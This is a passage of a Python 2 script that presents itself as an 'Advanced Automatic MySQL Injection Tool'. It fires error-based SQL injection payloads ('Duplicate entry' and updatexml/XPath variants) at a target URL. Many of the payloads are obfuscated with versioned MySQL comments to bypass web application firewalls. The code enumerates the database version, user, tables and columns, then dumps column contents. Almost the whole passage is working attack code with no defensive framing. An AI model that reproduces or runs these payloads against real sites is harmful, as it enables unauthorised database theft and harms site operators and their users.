  582.         pr5 = re.findall("Duplicate entry '(.*)~",xur5)
  583.         xur6 = urllib2.urlopen('%s+and(/*!00000select*/+1+/*!00000from*/(/*!00000select*/+count(*),concat/*!((/*!00000select*/+(/*!00000select*/+(/*!00000SELECT*/+distinct+concat/*!(0x7e,0x27,/*!00000cast(/*!00000table_name*/+as+char),0x27,0x7e)+/*!00000FROM*/+/*!00000information_schema*/./**/tables+/*!00000where*/+/*!00000table_schema*/=/*!00000database()*/+limit+3,1))+/*!00000from*/+/*!00000information_schema*/./**/tables+limit+0,1),floor(rand(0)*2))x+/*!00000from*/+/*!00000information_schema*/./**/tables+group+by+x)a)+/*!00000and+1=1*/--+' % ur).read()
  584.         pr6 = re.findall("Duplicate entry '(.*)~",xur6)
  585.         xur7 = urllib2.urlopen('%s+and(/*!00000select*/+1+/*!00000from*/(/*!00000select*/+count(*),concat/*!((/*!00000select*/+(/*!00000select*/+(/*!00000SELECT*/+distinct+concat/*!(0x7e,0x27,/*!00000cast(/*!00000table_name*/+as+char),0x27,0x7e)+/*!00000FROM*/+/*!00000information_schema*/./**/tables+/*!00000where*/+/*!00000table_schema*/=/*!00000database()*/+limit+4,1))+/*!00000from*/+/*!00000information_schema*/./**/tables+limit+0,1),floor(rand(0)*2))x+/*!00000from*/+/*!00000information_schema*/./**/tables+group+by+x)a)+/*!00000and+1=1*/--+' % ur).read()
  586.         pr7 = re.findall("Duplicate entry '(.*)~",xur7)
  587.         xur8 = urllib2.urlopen('%s+and(/*!00000select*/+1+/*!00000from*/(/*!00000select*/+count(*),concat/*!((/*!00000select*/+(/*!00000select*/+(/*!00000SELECT*/+distinct+concat/*!(0x7e,0x27,/*!00000cast(/*!00000table_name*/+as+char),0x27,0x7e)+/*!00000FROM*/+/*!00000information_schema*/./**/tables+/*!00000where*/+/*!00000table_schema*/=/*!00000database()*/+limit+5,1))+/*!00000from*/+/*!00000information_schema*/./**/tables+limit+0,1),floor(rand(0)*2))x+/*!00000from*/+/*!00000information_schema*/./**/tables+group+by+x)a)+/*!00000and+1=1*/--+' % ur).read()
  588.         pr8 = re.findall("Duplicate entry '(.*)~",xur8)
  589.         xur9 = urllib2.urlopen('%s+and(/*!00000select*/+1+/*!00000from*/(/*!00000select*/+count(*),concat/*!((/*!00000select*/+(/*!00000select*/+(/*!00000SELECT*/+distinct+concat/*!(0x7e,0x27,/*!00000cast(/*!00000table_name*/+as+char),0x27,0x7e)+/*!00000FROM*/+/*!00000information_schema*/./**/tables+/*!00000where*/+/*!00000table_schema*/=/*!00000database()*/+limit+6,1))+/*!00000from*/+/*!00000information_schema*/./**/tables+limit+0,1),floor(rand(0)*2))x+/*!00000from*/+/*!00000information_schema*/./**/tables+group+by+x)a)+/*!00000and+1=1*/--+' % ur).read()
  590.         pr9 = re.findall("Duplicate entry '(.*)~",xur9)
  591.         xur10 = urllib2.urlopen('%s+and(/*!00000select*/+1+/*!00000from*/(/*!00000select*/+count(*),concat/*!((/*!00000select*/+(/*!00000select*/+(/*!00000SELECT*/+distinct+concat/*!(0x7e,0x27,/*!00000cast(/*!00000table_name*/+as+char),0x27,0x7e)+/*!00000FROM*/+/*!00000information_schema*/./**/tables+/*!00000where*/+/*!00000table_schema*/=/*!00000database()*/+limit+7,1))+/*!00000from*/+/*!00000information_schema*/./**/tables+limit+0,1),floor(rand(0)*2))x+/*!00000from*/+/*!00000information_schema*/./**/tables+group+by+x)a)+/*!00000and+1=1*/--+' % ur).read()
  592.         pr10 = re.findall("Duplicate entry '(.*)~",xur10)
  593.         xur11 = urllib2.urlopen('%s+and(/*!00000select*/+1+/*!00000from*/(/*!00000select*/+count(*),concat/*!((/*!00000select*/+(/*!00000select*/+(/*!00000SELECT*/+distinct+concat/*!(0x7e,0x27,/*!00000cast(/*!00000table_name*/+as+char),0x27,0x7e)+/*!00000FROM*/+/*!00000information_schema*/./**/tables+/*!00000where*/+/*!00000table_schema*/=/*!00000database()*/+limit+8,1))+/*!00000from*/+/*!00000information_schema*/./**/tables+limit+0,1),floor(rand(0)*2))x+/*!00000from*/+/*!00000information_schema*/./**/tables+group+by+x)a)+/*!00000and+1=1*/--+' % ur).read()
  594.         pr11 = re.findall("Duplicate entry '(.*)~",xur11)
  595.         xur12 = urllib2.urlopen('%s+and(/*!00000select*/+1+/*!00000from*/(/*!00000select*/+count(*),concat/*!((/*!00000select*/+(/*!00000select*/+(/*!00000SELECT*/+distinct+concat/*!(0x7e,0x27,/*!00000cast(/*!00000table_name*/+as+char),0x27,0x7e)+/*!00000FROM*/+/*!00000information_schema*/./**/tables+/*!00000where*/+/*!00000table_schema*/=/*!00000database()*/+limit+9,1))+/*!00000from*/+/*!00000information_schema*/./**/tables+limit+0,1),floor(rand(0)*2))x+/*!00000from*/+/*!00000information_schema*/./**/tables+group+by+x)a)+/*!00000and+1=1*/--+' % ur).read()
  596.         pr12 = re.findall("Duplicate entry '(.*)~",xur12)
  597.         xur13 = urllib2.urlopen('%s+and(/*!00000select*/+1+/*!00000from*/(/*!00000select*/+count(*),concat/*!((/*!00000select*/+(/*!00000select*/+(/*!00000SELECT*/+distinct+concat/*!(0x7e,0x27,/*!00000cast(/*!00000table_name*/+as+char),0x27,0x7e)+/*!00000FROM*/+/*!00000information_schema*/./**/tables+/*!00000where*/+/*!00000table_schema*/=/*!00000database()*/+limit+10,1))+/*!00000from*/+/*!00000information_schema*/./**/tables+limit+0,1),floor(rand(0)*2))x+/*!00000from*/+/*!00000information_schema*/./**/tables+group+by+x)a)+/*!00000and+1=1*/--+' % ur).read()
  598.         pr13 = re.findall("Duplicate entry '(.*)~",xur13)
  599.         xur14 = urllib2.urlopen('%s+and(/*!00000select*/+1+/*!00000from*/(/*!00000select*/+count(*),concat/*!((/*!00000select*/+(/*!00000select*/+(/*!00000SELECT*/+distinct+concat/*!(0x7e,0x27,/*!00000cast(/*!00000table_name*/+as+char),0x27,0x7e)+/*!00000FROM*/+/*!00000information_schema*/./**/tables+/*!00000where*/+/*!00000table_schema*/=/*!00000database()*/+limit+11,1))+/*!00000from*/+/*!00000information_schema*/./**/tables+limit+0,1),floor(rand(0)*2))x+/*!00000from*/+/*!00000information_schema*/./**/tables+group+by+x)a)+/*!00000and+1=1*/--+' % ur).read()
  600.         pr14 = re.findall("Duplicate entry '(.*)~",xur14)
  601.         xur15 = urllib2.urlopen('%s+and(/*!00000select*/+1+/*!00000from*/(/*!00000select*/+count(*),concat/*!((/*!00000select*/+(/*!00000select*/+(/*!00000SELECT*/+distinct+concat/*!(0x7e,0x27,/*!00000cast(/*!00000table_name*/+as+char),0x27,0x7e)+/*!00000FROM*/+/*!00000information_schema*/./**/tables+/*!00000where*/+/*!00000table_schema*/=/*!00000database()*/+limit+12,1))+/*!00000from*/+/*!00000information_schema*/./**/tables+limit+0,1),floor(rand(0)*2))x+/*!00000from*/+/*!00000information_schema*/./**/tables+group+by+x)a)+/*!00000and+1=1*/--+' % ur).read()
  602.         pr15 = re.findall("Duplicate entry '(.*)~",xur15)
  603.         xur16 = urllib2.urlopen('%s+and(/*!00000select*/+1+/*!00000from*/(/*!00000select*/+count(*),concat/*!((/*!00000select*/+(/*!00000select*/+(/*!00000SELECT*/+distinct+concat/*!(0x7e,0x27,/*!00000cast(/*!00000table_name*/+as+char),0x27,0x7e)+/*!00000FROM*/+/*!00000information_schema*/./**/tables+/*!00000where*/+/*!00000table_schema*/=/*!00000database()*/+limit+13,1))+/*!00000from*/+/*!00000information_schema*/./**/tables+limit+0,1),floor(rand(0)*2))x+/*!00000from*/+/*!00000information_schema*/./**/tables+group+by+x)a)+/*!00000and+1=1*/--+' % ur).read()
  604.         pr16 = re.findall("Duplicate entry '(.*)~",xur16)
  605.         xur17 = urllib2.urlopen('%s+and(/*!00000select*/+1+/*!00000from*/(/*!00000select*/+count(*),concat/*!((/*!00000select*/+(/*!00000select*/+(/*!00000SELECT*/+distinct+concat/*!(0x7e,0x27,/*!00000cast(/*!00000table_name*/+as+char),0x27,0x7e)+/*!00000FROM*/+/*!00000information_schema*/./**/tables+/*!00000where*/+/*!00000table_schema*/=/*!00000database()*/+limit+14,1))+/*!00000from*/+/*!00000information_schema*/./**/tables+limit+0,1),floor(rand(0)*2))x+/*!00000from*/+/*!00000information_schema*/./**/tables+group+by+x)a)+/*!00000and+1=1*/--+' % ur).read()
  606.         pr17 = re.findall("Duplicate entry '(.*)~",xur17)
  607.         xur18 = urllib2.urlopen('%s+and(/*!00000select*/+1+/*!00000from*/(/*!00000select*/+count(*),concat/*!((/*!00000select*/+(/*!00000select*/+(/*!00000SELECT*/+distinct+concat/*!(0x7e,0x27,/*!00000cast(/*!00000table_name*/+as+char),0x27,0x7e)+/*!00000FROM*/+/*!00000information_schema*/./**/tables+/*!00000where*/+/*!00000table_schema*/=/*!00000database()*/+limit+15,1))+/*!00000from*/+/*!00000information_schema*/./**/tables+limit+0,1),floor(rand(0)*2))x+/*!00000from*/+/*!00000information_schema*/./**/tables+group+by+x)a)+/*!00000and+1=1*/--+' % ur).read()
  608.         pr18 = re.findall("Duplicate entry '(.*)~",xur18)
  609.         xur19 = urllib2.urlopen('%s+and(/*!00000select*/+1+/*!00000from*/(/*!00000select*/+count(*),concat/*!((/*!00000select*/+(/*!00000select*/+(/*!00000SELECT*/+distinct+concat/*!(0x7e,0x27,/*!00000cast(/*!00000table_name*/+as+char),0x27,0x7e)+/*!00000FROM*/+/*!00000information_schema*/./**/tables+/*!00000where*/+/*!00000table_schema*/=/*!00000database()*/+limit+16,1))+/*!00000from*/+/*!00000information_schema*/./**/tables+limit+0,1),floor(rand(0)*2))x+/*!00000from*/+/*!00000information_schema*/./**/tables+group+by+x)a)+/*!00000and+1=1*/--+' % ur).read()
  610.         pr19 = re.findall("Duplicate entry '(.*)~",xur19)
  611.         xur20 = urllib2.urlopen('%s+and(/*!00000select*/+1+/*!00000from*/(/*!00000select*/+count(*),concat/*!((/*!00000select*/+(/*!00000select*/+(/*!00000SELECT*/+distinct+concat/*!(0x7e,0x27,/*!00000cast(/*!00000table_name*/+as+char),0x27,0x7e)+/*!00000FROM*/+/*!00000information_schema*/./**/tables+/*!00000where*/+/*!00000table_schema*/=/*!00000database()*/+limit+17,1))+/*!00000from*/+/*!00000information_schema*/./**/tables+limit+0,1),floor(rand(0)*2))x+/*!00000from*/+/*!00000information_schema*/./**/tables+group+by+x)a)+/*!00000and+1=1*/--+' % ur).read()
  612.         pr20 = re.findall("Duplicate entry '(.*)~",xur20)
  613.         xur21 = urllib2.urlopen('%s+and(/*!00000select*/+1+/*!00000from*/(/*!00000select*/+count(*),concat/*!((/*!00000select*/+(/*!00000select*/+(/*!00000SELECT*/+distinct+concat/*!(0x7e,0x27,/*!00000cast(/*!00000table_name*/+as+char),0x27,0x7e)+/*!00000FROM*/+/*!00000information_schema*/./**/tables+/*!00000where*/+/*!00000table_schema*/=/*!00000database()*/+limit+18,1))+/*!00000from*/+/*!00000information_schema*/./**/tables+limit+0,1),floor(rand(0)*2))x+/*!00000from*/+/*!00000information_schema*/./**/tables+group+by+x)a)+/*!00000and+1=1*/--+' % ur).read()
  614.         pr21 = re.findall("Duplicate entry '(.*)~",xur21)
  615.         xur22 = urllib2.urlopen('%s+and(/*!00000select*/+1+/*!00000from*/(/*!00000select*/+count(*),concat/*!((/*!00000select*/+(/*!00000select*/+(/*!00000SELECT*/+distinct+concat/*!(0x7e,0x27,/*!00000cast(/*!00000table_name*/+as+char),0x27,0x7e)+/*!00000FROM*/+/*!00000information_schema*/./**/tables+/*!00000where*/+/*!00000table_schema*/=/*!00000database()*/+limit+19,1))+/*!00000from*/+/*!00000information_schema*/./**/tables+limit+0,1),floor(rand(0)*2))x+/*!00000from*/+/*!00000information_schema*/./**/tables+group+by+x)a)+/*!00000and+1=1*/--+' % ur).read()
  616.         pr22 = re.findall("Duplicate entry '(.*)~",xur22)
  617.         xur23 = urllib2.urlopen('%s+and(/*!00000select*/+1+/*!00000from*/(/*!00000select*/+count(*),concat/*!((/*!00000select*/+(/*!00000select*/+(/*!00000SELECT*/+distinct+concat/*!(0x7e,0x27,/*!00000cast(/*!00000table_name*/+as+char),0x27,0x7e)+/*!00000FROM*/+/*!00000information_schema*/./**/tables+/*!00000where*/+/*!00000table_schema*/=/*!00000database()*/+limit+20,1))+/*!00000from*/+/*!00000information_schema*/./**/tables+limit+0,1),floor(rand(0)*2))x+/*!00000from*/+/*!00000information_schema*/./**/tables+group+by+x)a)+/*!00000and+1=1*/--+' % ur).read()
  618.         pr23 = re.findall("Duplicate entry '(.*)~",xur23)
  619.        
  620.         print "\nDatabase Version : "
  621.         print pr
  622.         print "\nDatabase Name : "
  623.         print pr1
  624.         print "\nDatabase User : "
  625.         print pr2
  626.         print "\nTables :"
  627.         print pr3
  628.         print pr4
  629.         print pr5
  630.         print pr6
  631.         print pr7
  632.         print pr8
  633.         print pr9
  634.         print pr10
  635.         print pr11
  636.         print pr12
  637.         print pr13
  638.         print pr14
  639.         print pr15
  640.         print pr16
  641.         print pr17
  642.         print pr18
  643.         print pr19
  644.         print pr20
  645.         print pr21
  646.         print pr22
  647.         print pr23
  648.        
  649.         print "\n\n"
  650.         xpcol = raw_input("Enter The Name Of Table to Grab Columns :")
  651.         xpcol1 = xpcol.encode("hex")
  652.         xur24 = urllib2.urlopen('%s+and(/*!00000select*/+1+/*!00000from*/(/*!00000select*/+count(*),concat/*!((/*!00000select*/+(/*!00000select*/+(/*!00000SELECT*/+distinct+concat/*!(0x7e,0x27,/*!00000cast(/*!00000column_name*/+as+char),0x27,0x7e)+/*!00000FROM*/+/*!00000information_schema*/./**/columns+/*!00000where*/+/*!00000table_name*/=0x%s+limit+0,1))+/*!00000from*/+/*!00000information_schema*/./**/tables+limit+0,1),floor(rand(0)*2))x+/*!00000from*/+/*!00000information_schema*/./**/tables+group+by+x)a)+/*!00000and+1=1*/--+' % ( ur, xpcol1)).read()
  653.         pr24 = re.findall("Duplicate entry '(.*)~",xur24)
  654.         xur25 = urllib2.urlopen('%s+and(/*!00000select*/+1+/*!00000from*/(/*!00000select*/+count(*),concat/*!((/*!00000select*/+(/*!00000select*/+(/*!00000SELECT*/+distinct+concat/*!(0x7e,0x27,/*!00000cast(/*!00000column_name*/+as+char),0x27,0x7e)+/*!00000FROM*/+/*!00000information_schema*/./**/columns+/*!00000where*/+/*!00000table_name*/=0x%s+limit+1,1))+/*!00000from*/+/*!00000information_schema*/./**/tables+limit+0,1),floor(rand(0)*2))x+/*!00000from*/+/*!00000information_schema*/./**/tables+group+by+x)a)+/*!00000and+1=1*/--+' % ( ur, xpcol1)).read()
  655.         pr25 = re.findall("Duplicate entry '(.*)~",xur25)
  656.         xur26 = urllib2.urlopen('%s+and(/*!00000select*/+1+/*!00000from*/(/*!00000select*/+count(*),concat/*!((/*!00000select*/+(/*!00000select*/+(/*!00000SELECT*/+distinct+concat/*!(0x7e,0x27,/*!00000cast(/*!00000column_name*/+as+char),0x27,0x7e)+/*!00000FROM*/+/*!00000information_schema*/./**/columns+/*!00000where*/+/*!00000table_name*/=0x%s+limit+2,1))+/*!00000from*/+/*!00000information_schema*/./**/tables+limit+0,1),floor(rand(0)*2))x+/*!00000from*/+/*!00000information_schema*/./**/tables+group+by+x)a)+/*!00000and+1=1*/--+' % ( ur, xpcol1)).read()
  657.         pr26 = re.findall("Duplicate entry '(.*)~",xur26)
  658.         xur27 = urllib2.urlopen('%s+and(/*!00000select*/+1+/*!00000from*/(/*!00000select*/+count(*),concat/*!((/*!00000select*/+(/*!00000select*/+(/*!00000SELECT*/+distinct+concat/*!(0x7e,0x27,/*!00000cast(/*!00000column_name*/+as+char),0x27,0x7e)+/*!00000FROM*/+/*!00000information_schema*/./**/columns+/*!00000where*/+/*!00000table_name*/=0x%s+limit+3,1))+/*!00000from*/+/*!00000information_schema*/./**/tables+limit+0,1),floor(rand(0)*2))x+/*!00000from*/+/*!00000information_schema*/./**/tables+group+by+x)a)+/*!00000and+1=1*/--+' % ( ur, xpcol1)).read()
  659.         pr27 = re.findall("Duplicate entry '(.*)~",xur27)
  660.         xur28 = urllib2.urlopen('%s+and(/*!00000select*/+1+/*!00000from*/(/*!00000select*/+count(*),concat/*!((/*!00000select*/+(/*!00000select*/+(/*!00000SELECT*/+distinct+concat/*!(0x7e,0x27,/*!00000cast(/*!00000column_name*/+as+char),0x27,0x7e)+/*!00000FROM*/+/*!00000information_schema*/./**/columns+/*!00000where*/+/*!00000table_name*/=0x%s+limit+4,1))+/*!00000from*/+/*!00000information_schema*/./**/tables+limit+0,1),floor(rand(0)*2))x+/*!00000from*/+/*!00000information_schema*/./**/tables+group+by+x)a)+/*!00000and+1=1*/--+' % ( ur, xpcol1)).read()
  661.         pr28 = re.findall("Duplicate entry '(.*)~",xur28)
  662.         xur29 = urllib2.urlopen('%s+and(/*!00000select*/+1+/*!00000from*/(/*!00000select*/+count(*),concat/*!((/*!00000select*/+(/*!00000select*/+(/*!00000SELECT*/+distinct+concat/*!(0x7e,0x27,/*!00000cast(/*!00000column_name*/+as+char),0x27,0x7e)+/*!00000FROM*/+/*!00000information_schema*/./**/columns+/*!00000where*/+/*!00000table_name*/=0x%s+limit+5,1))+/*!00000from*/+/*!00000information_schema*/./**/tables+limit+0,1),floor(rand(0)*2))x+/*!00000from*/+/*!00000information_schema*/./**/tables+group+by+x)a)+/*!00000and+1=1*/--+' % ( ur, xpcol1)).read()
  663.         pr29 = re.findall("Duplicate entry '(.*)~",xur29)
  664.         xur30 = urllib2.urlopen('%s+and(/*!00000select*/+1+/*!00000from*/(/*!00000select*/+count(*),concat/*!((/*!00000select*/+(/*!00000select*/+(/*!00000SELECT*/+distinct+concat/*!(0x7e,0x27,/*!00000cast(/*!00000column_name*/+as+char),0x27,0x7e)+/*!00000FROM*/+/*!00000information_schema*/./**/columns+/*!00000where*/+/*!00000table_name*/=0x%s+limit+6,1))+/*!00000from*/+/*!00000information_schema*/./**/tables+limit+0,1),floor(rand(0)*2))x+/*!00000from*/+/*!00000information_schema*/./**/tables+group+by+x)a)+/*!00000and+1=1*/--+' % ( ur, xpcol1)).read()
  665.         pr30 = re.findall("Duplicate entry '(.*)~",xur30)
  666.         xur31 = urllib2.urlopen('%s+and(/*!00000select*/+1+/*!00000from*/(/*!00000select*/+count(*),concat/*!((/*!00000select*/+(/*!00000select*/+(/*!00000SELECT*/+distinct+concat/*!(0x7e,0x27,/*!00000cast(/*!00000column_name*/+as+char),0x27,0x7e)+/*!00000FROM*/+/*!00000information_schema*/./**/columns+/*!00000where*/+/*!00000table_name*/=0x%s+limit+7,1))+/*!00000from*/+/*!00000information_schema*/./**/tables+limit+0,1),floor(rand(0)*2))x+/*!00000from*/+/*!00000information_schema*/./**/tables+group+by+x)a)+/*!00000and+1=1*/--+' % ( ur, xpcol1)).read()
  667.         pr31 = re.findall("Duplicate entry '(.*)~",xur31)
  668.         xur32 = urllib2.urlopen('%s+and(/*!00000select*/+1+/*!00000from*/(/*!00000select*/+count(*),concat/*!((/*!00000select*/+(/*!00000select*/+(/*!00000SELECT*/+distinct+concat/*!(0x7e,0x27,/*!00000cast(/*!00000column_name*/+as+char),0x27,0x7e)+/*!00000FROM*/+/*!00000information_schema*/./**/columns+/*!00000where*/+/*!00000table_name*/=0x%s+limit+8,1))+/*!00000from*/+/*!00000information_schema*/./**/tables+limit+0,1),floor(rand(0)*2))x+/*!00000from*/+/*!00000information_schema*/./**/tables+group+by+x)a)+/*!00000and+1=1*/--+' % ( ur, xpcol1)).read()
  669.         pr32 = re.findall("Duplicate entry '(.*)~",xur32)
  670.         xur33 = urllib2.urlopen('%s+and(/*!00000select*/+1+/*!00000from*/(/*!00000select*/+count(*),concat/*!((/*!00000select*/+(/*!00000select*/+(/*!00000SELECT*/+distinct+concat/*!(0x7e,0x27,/*!00000cast(/*!00000column_name*/+as+char),0x27,0x7e)+/*!00000FROM*/+/*!00000information_schema*/./**/columns+/*!00000where*/+/*!00000table_name*/=0x%s+limit+9,1))+/*!00000from*/+/*!00000information_schema*/./**/tables+limit+0,1),floor(rand(0)*2))x+/*!00000from*/+/*!00000information_schema*/./**/tables+group+by+x)a)+/*!00000and+1=1*/--+' % ( ur, xpcol1)).read()
  671.         pr33 = re.findall("Duplicate entry '(.*)~",xur33)
  672.         xur34 = urllib2.urlopen('%s+and(/*!00000select*/+1+/*!00000from*/(/*!00000select*/+count(*),concat/*!((/*!00000select*/+(/*!00000select*/+(/*!00000SELECT*/+distinct+concat/*!(0x7e,0x27,/*!00000cast(/*!00000column_name*/+as+char),0x27,0x7e)+/*!00000FROM*/+/*!00000information_schema*/./**/columns+/*!00000where*/+/*!00000table_name*/=0x%s+limit+10,1))+/*!00000from*/+/*!00000information_schema*/./**/tables+limit+0,1),floor(rand(0)*2))x+/*!00000from*/+/*!00000information_schema*/./**/tables+group+by+x)a)+/*!00000and+1=1*/--+' % ( ur, xpcol1)).read()
  673.         pr34 = re.findall("Duplicate entry '(.*)~",xur34)
  674.         xur35 = urllib2.urlopen('%s+and(/*!00000select*/+1+/*!00000from*/(/*!00000select*/+count(*),concat/*!((/*!00000select*/+(/*!00000select*/+(/*!00000SELECT*/+distinct+concat/*!(0x7e,0x27,/*!00000cast(/*!00000column_name*/+as+char),0x27,0x7e)+/*!00000FROM*/+/*!00000information_schema*/./**/columns+/*!00000where*/+/*!00000table_name*/=0x%s+limit+11,1))+/*!00000from*/+/*!00000information_schema*/./**/tables+limit+0,1),floor(rand(0)*2))x+/*!00000from*/+/*!00000information_schema*/./**/tables+group+by+x)a)+/*!00000and+1=1*/--+' % ( ur, xpcol1)).read()
  675.         pr35 = re.findall("Duplicate entry '(.*)~",xur35)
  676.         xur36 = urllib2.urlopen('%s+and(/*!00000select*/+1+/*!00000from*/(/*!00000select*/+count(*),concat/*!((/*!00000select*/+(/*!00000select*/+(/*!00000SELECT*/+distinct+concat/*!(0x7e,0x27,/*!00000cast(/*!00000column_name*/+as+char),0x27,0x7e)+/*!00000FROM*/+/*!00000information_schema*/./**/columns+/*!00000where*/+/*!00000table_name*/=0x%s+limit+12,1))+/*!00000from*/+/*!00000information_schema*/./**/tables+limit+0,1),floor(rand(0)*2))x+/*!00000from*/+/*!00000information_schema*/./**/tables+group+by+x)a)+/*!00000and+1=1*/--+' % ( ur, xpcol1)).read()
  677.         pr36 = re.findall("Duplicate entry '(.*)~",xur36)
  678.         xur37 = urllib2.urlopen('%s+and(/*!00000select*/+1+/*!00000from*/(/*!00000select*/+count(*),concat/*!((/*!00000select*/+(/*!00000select*/+(/*!00000SELECT*/+distinct+concat/*!(0x7e,0x27,/*!00000cast(/*!00000column_name*/+as+char),0x27,0x7e)+/*!00000FROM*/+/*!00000information_schema*/./**/columns+/*!00000where*/+/*!00000table_name*/=0x%s+limit+13,1))+/*!00000from*/+/*!00000information_schema*/./**/tables+limit+0,1),floor(rand(0)*2))x+/*!00000from*/+/*!00000information_schema*/./**/tables+group+by+x)a)+/*!00000and+1=1*/--+' % ( ur, xpcol1)).read()
  679.         pr37 = re.findall("Duplicate entry '(.*)~",xur37)
  680.         xur38 = urllib2.urlopen('%s+and(/*!00000select*/+1+/*!00000from*/(/*!00000select*/+count(*),concat/*!((/*!00000select*/+(/*!00000select*/+(/*!00000SELECT*/+distinct+concat/*!(0x7e,0x27,/*!00000cast(/*!00000column_name*/+as+char),0x27,0x7e)+/*!00000FROM*/+/*!00000information_schema*/./**/columns+/*!00000where*/+/*!00000table_name*/=0x%s+limit+14,1))+/*!00000from*/+/*!00000information_schema*/./**/tables+limit+0,1),floor(rand(0)*2))x+/*!00000from*/+/*!00000information_schema*/./**/tables+group+by+x)a)+/*!00000and+1=1*/--+' % ( ur, xpcol1)).read()
  681.         pr38 = re.findall("Duplicate entry '(.*)~",xur38)
  682.        
  683.         print "\nColumns : "
  684.         print pr24
  685.         print pr25
  686.         print pr26
  687.         print pr27
  688.         print pr28
  689.         print pr29
  690.         print pr30
  691.         print pr31
  692.         print pr32
  693.         print pr33
  694.         print pr34
  695.         print pr35
  696.         print pr36
  697.         print pr37
  698.         print pr38
  699.        
  700.         print "\n  Note : If you don't want any column just leave it empty :)\n"
  701.         xpdt = raw_input("Enter First Column Name : ")
  702.         xpdt1 = raw_input("Enter Second Column Name : ")
  703.         xpdt2 = raw_input("Enter Third Column Name : ")
  704.         xpdt3 = raw_input("Enter Fourth Column Name : ")
  705.         xpdt4 = raw_input("Enter Fifth Column Name : ")
  706.         wfxur39 = urllib2.urlopen('%s+and+updatexml(0x3a,concat/*!(0x3a,(/*!50000select*/+/*!%s*/+/*!from*/+%s+limit+0,1)),0x3a)--+' % ( ur, xpdt, xpcol)).read()
  707.         wfpr39 = re.findall("XPATH syntax error: ':(.*)'",wfxur39)
  708.         wfxur40 = urllib2.urlopen('%s+and+updatexml(0x3a,concat/*!(0x3a,(/*!50000select*/+/*!%s*/+/*!from*/+%s+limit+0,1)),0x3a)--+' % ( ur, xpdt1, xpcol)).read()
  709.         wfpr40 = re.findall("XPATH syntax error: ':(.*)'",wfxur40)
  710.         wfxur41 = urllib2.urlopen('%s+and+updatexml(0x3a,concat/*!(0x3a,(/*!50000select*/+/*!%s*/+/*!from*/+%s+limit+0,1)),0x3a)--+' % ( ur, xpdt2, xpcol)).read()
  711.         wfpr41 = re.findall("XPATH syntax error: ':(.*)'",wfxur41)
  712.         wfxur42 = urllib2.urlopen('%s+and+updatexml(0x3a,concat/*!(0x3a,(/*!50000select*/+/*!%s*/+/*!from*/+%s+limit+0,1)),0x3a)--+' % ( ur, xpdt3, xpcol)).read()
  713.         wfpr42 = re.findall("XPATH syntax error: ':(.*)'",wfxur42)
  714.         wfxur43 = urllib2.urlopen('%s+and+updatexml(0x3a,concat/*!(0x3a,(/*!50000select*/+/*!%s*/+/*!from*/+%s+limit+0,1)),0x3a)--+' % ( ur, xpdt4, xpcol)).read()
  715.         wfpr43 = re.findall("XPATH syntax error: ':(.*)'",wfxur43)
  716.         print "\n\nFirst Column Result : "
  717.         print wfpr39
  718.         print "\nSecond Column Result : "
  719.         print wfpr40
  720.         print "\nThird Column Result : "
  721.         print wfpr41
  722.         print "\nFourth Column Result : "
  723.         print wfpr42
  724.         print "\nFifth Column Result : "
  725.         print wfpr43
  726.        
  727.         print "\n\n   All Processes Done!\n   Turning Off All Functions!"
  728.         time.sleep(1)
  729.         print "Press Enter To Exit.."
  730.  
  731. def xpath_main():
  732.     time.sleep(1.4)
  733.     os.system("cls")
  734.     print "\n" + "~"*50 + "\n -                Xpath Injection\n" + "~"*50+ "\n\n"
  735.     print "# -- Xpath Simple = 1\n# -- Xpath WAF Bypassed = 2\n"
  736.     loxx = raw_input("Enter Code : ")
  737.     if(loxx =='1'):
  738.             print "\n\n                           XPATH Simple \n"
  739.             xpath_simple()
  740.     elif(loxx =='2'):
  741.             print "\n\n                           XPATH WAF-Bypassed \n"
  742.             xpath_waf()
  743.     else:
  744.         print " Please Enter Valid Code Leet!"
  745.        
  746. def error_main():
  747.     time.sleep(1.4)
  748.     os.system("cls")
  749.     print "\n" + "~"*50 + "\n -                Error Based Injection\n" + "~"*50+ "\n\n"
  750.     print "# -- Error Based Simple = 1\n# -- Error Based WAF Bypassed = 2\n"
  751.     eblox = raw_input("Enter Code : ")
  752.     if(eblox =='1'):
  753.             print "\n\n                            Error Based Simple \n"
  754.             error_simple()
  755.     elif(eblox =='2'):
  756.             print "\n\n                            Error Based WAF-Bypassed \n"
  757.             error_waf()
  758.     else:
  759.         print " Please Enter Valid Code Leet!"
  760.    
  761. def duplicate_main():
  762.     time.sleep(1.4)
  763.     os.system("cls")
  764.     print "\n" + "~"*50 + "\n -                Duplicate Entry Injection\n" + "~"*50+ "\n\n"
  765.     print "# -- Duplicate Entry Simple = 1\n# -- Duplicate Entry WAF Bypassed = 2\n"
  766.     ebloxx = raw_input("Enter Code : ")
  767.     if(ebloxx =='1'):
  768.             print "\n\n                            Duplicate Entry Simple \n"
  769.             duplicate_simple()
  770.     elif(ebloxx =='2'):
  771.             print "\n\n                            Duplicate Entry WAF-Bypassed \n"
  772.             duplicate_waf()
  773.     else:
  774.         print " Please Enter Valid Code Leet!"
  775.        
  776. def typex():
  777.     print "# -- Xpath = 1\n# -- Duplicate Entry = 2"
  778.     print "\n\n"
  779.     tyas = raw_input("Enter Code : ")
  780.     if(tyas =='1'):
  781.             xpath_main()
  782.     elif(tyas =='2'):
  783.             duplicate_main()
  784.     else:
  785.         print "Please Enter Valid Code Leet!"
  786.  
  787. def intro():
  788.     def sysacc():
  789.         os.system("cls")
  790.         time.sleep(1)
  791.         os.system("title      -      Advanced Automatic MySQL Injection Tool     ::   Coded By James   ::")
  792.         usx = 'hfre'
  793.         psx = 'cnff'
  794.         print "\n       ###        Please Login To Continue          ###\n" + "-"*55
  795.         pol = raw_input("  Enter Your Username : ")
  796.         pol1 = raw_input("  Enter Your Password : ")
  797.         if(pol != usx.decode('rot13','strict')):
  798.             print "Username is Incorrect!"
  799.             time.sleep(1)
  800.             sys.exit(0)
  801.         if(pol1 != psx.decode('rot13','strict')):
  802.             print "Password is Incorrect!"
  803.             time.sleep(1)
  804.             sys.exit(0)
  805.         acc()
  806.     sysacc()
  807.     os.system("cls")
  808.     os.system("title      -      Advanced Automatic MySQL Injection Tool     ::   Coded By James   ::")
  809.     os.system("color A")
  810.     print "\n"
  811.     time.sleep(2)
  812.     print (" :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::")
  813.     print (" ::                             *****                               ::")
  814.     print (" ::~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~::")
  815.     print (" ::             | Advanced Automatic MySQL Injection Tool |         ::")
